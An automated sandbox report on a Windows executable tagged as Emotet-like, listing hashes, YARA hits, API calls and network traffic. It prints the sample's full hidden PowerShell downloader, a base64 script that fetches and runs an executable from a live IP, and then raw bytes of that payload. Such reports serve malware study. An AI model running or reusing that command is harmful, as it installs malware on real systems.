Summary | ZeroBOX

tg01985462ss.exe

Emotet Gen1 Generic Malware Malicious Library Antivirus UPX PE File PE64 CAB
Category Machine Started Completed
FILE s1_win7_x6401 March 3, 2025, 2:42 p.m. March 3, 2025, 2:50 p.m.
Size 264.3KB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 73ff439239900589550d046df99566f7
SHA256 ae577a74a4544fd340b9df46efec6246b3902fa7c4dad9da732aedf571dcf562
CRC32 097D4A8B
ssdeep 6144:0eR7eammZbop0yN90vEx6q7M6VY+lberm/8WAW:0eRtBZb5y90ilvWrK86
PDB Path wextract.pdb
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE64 - (no description)
  • Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet
  • CAB_file_format - CAB archive file
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
23.27.46.60 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: '■' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x000000000000000b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002d61c0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000350ce0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000350ce0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0000000000350ce0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ce670
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ce670
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ce600
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ce600
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ce600
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ce600
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ce6e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ce6e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ce6e0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ce9f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ce9f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ce9f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ceec0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ceec0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ceec0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ceec0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ceec0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ceec0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ceec0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ceec0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ceec0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ceec0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9ceec0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9cefa0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9cefa0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9cf010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9cf010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9cf080
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9cf080
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9cf080
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002befa0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002befa0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002befa0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00000000002befa0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9fab80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001b9fab80
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001ba28300
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001ba28300
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001ba28300
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x000000001ba28300
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path wextract.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
resource name AVI
suspicious_features Connection to IP address suspicious_request GET http://23.27.46.60/a0001/tg01985462.exe
request GET http://23.27.46.60/a0001/tg01985462.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002b40000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef39b1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c2e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c2e000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c2f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c2f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c2f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c2f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c2f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c2f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c2f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c2f000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c30000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c30000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c30000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c30000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c30000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c31000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c31000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c31000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c31000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2828
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef3c2e000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00052000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 589824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0010a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c62000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c64000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0011a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00053000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00054000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00142000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0011d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0010b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00102000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00055000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00190000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00056000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00143000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0010c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00103000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0004a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00057000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2828
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002c67000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\tg01985462s.bat
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -WindowStyle Hidden -ep bypass -nop -Command "& {Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHdjPU5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQKJHdjLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS85MC4wLjQ0MzAuNzIgU2FmYXJpLzUzNy4zNicpCiRieXRlcz0kd2MuRG93bmxvYWREYXRhKCdodHRwOi8vMjMuMjcuNDYuNjAvYTAwMDEvdGcwMTk4NTQ2Mi5leGUnKQokYXNzZW09W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRieXRlcykKJGFzc2VtLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKQ==')))}"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2832
thread_handle: 0x0000000000000068
process_identifier: 2828
current_directory: C:\Users\test22\AppData\Local\Temp\IXP000.TMP
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -WindowStyle Hidden -ep bypass -nop -Command "& {Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHdjPU5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQKJHdjLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS85MC4wLjQ0MzAuNzIgU2FmYXJpLzUzNy4zNicpCiRieXRlcz0kd2MuRG93bmxvYWREYXRhKCdodHRwOi8vMjMuMjcuNDYuNjAvYTAwMDEvdGcwMTk4NTQ2Mi5leGUnKQokYXNzZW09W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRieXRlcykKJGFzc2VtLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKQ==')))}"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000070
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
section {u'size_of_data': u'0x0001a000', u'virtual_address': u'0x0000f000', u'entropy': 7.039918104525348, u'name': u'.rsrc', u'virtual_size': u'0x000194ea'} entropy 7.03991810453 description A section with a high entropy has been found
entropy 0.65 description Overall entropy of this PE file is high
Data received HTTP/1.1 200 OK Date: Mon, 03 Mar 2025 05:49:24 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Wed, 26 Feb 2025 12:45:21 GMT ETag: "174a00-62f0af24b2372" Accept-Ranges: bytes Content-Length: 1526272 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELa ¿gà hàކ  @  ­8`…†K öÜ€  H.textäf h `.rsrcöÜ Þj@@.reloc €H@BÀ†HTWH6œæø*(*0¸ þ8þ E9d8 |( *} ~€{8:½ÿÿÿ& 8²ÿÿÿ( } ~€{e9’ÿÿÿ& 8‡ÿÿÿ|(+ ~€{69eÿÿÿ& 8Zÿÿÿ0z þ8þ E+,8&( ~€{4:Ïÿÿÿ& 8Äÿÿÿ*(o  ~€{-9£ÿÿÿ& 8˜ÿÿÿ&~þ*~*0/( }}|(+|( *0/( } } | (+| ( *0  þ8þ E 8›($ o%  ~€{,:& 8þ E8ÝW& ~€{[9& 8þ E8s# z ~€{29^ÿÿÿ& 8Sÿÿÿ*%Ch8 &~þ*~*0   þ8þ ER+8Ms ~€{j:Ïÿÿÿ& 8Äÿÿÿ} ~€{O:¨ÿÿÿ& 8ÿÿÿo& þs' (+%() 9s# z*&~þ*~*0ò  þ8þ E8*:; ~€{C:& 8þ E:8s# z o- & ~€{W9Äÿÿÿ& 8¹ÿÿÿ݉ÿÿÿ& ~€{N:& 8þ E8s# z ~€{t:+ÿÿÿ& 8 ÿÿÿ&u›8 &~þ*~*(* *0” þ8þ E.48)~: ~€{>9Ìÿÿÿ& 8Áÿÿÿ~*r­pÐ (. o/ s0 € ~€{h9‰ÿÿÿ& 8~ÿÿÿ~*€*j(#rép~o1 t*&~þ*~*09 }"( }}{ ( +|( *0‚ þ8þ E984(>z*~&o7  ~€{5:Áÿÿÿ& 8¶ÿÿÿ:Ëÿÿÿ ~€{c:›ÿÿÿ& 8ÿÿÿ *.rÿps8 *(* *0_ þ8þ E?8:~(þEs9 s: €& ~€{\:¿ÿÿÿ& 8´ÿÿÿ*&~'þ*~'*0„ þ8þ E.X,8)þ} ~€{y:Æÿÿÿ& 8»ÿÿÿ& 8þ E'8":Õ ~€{‘:& 8þ E “èn}Ö
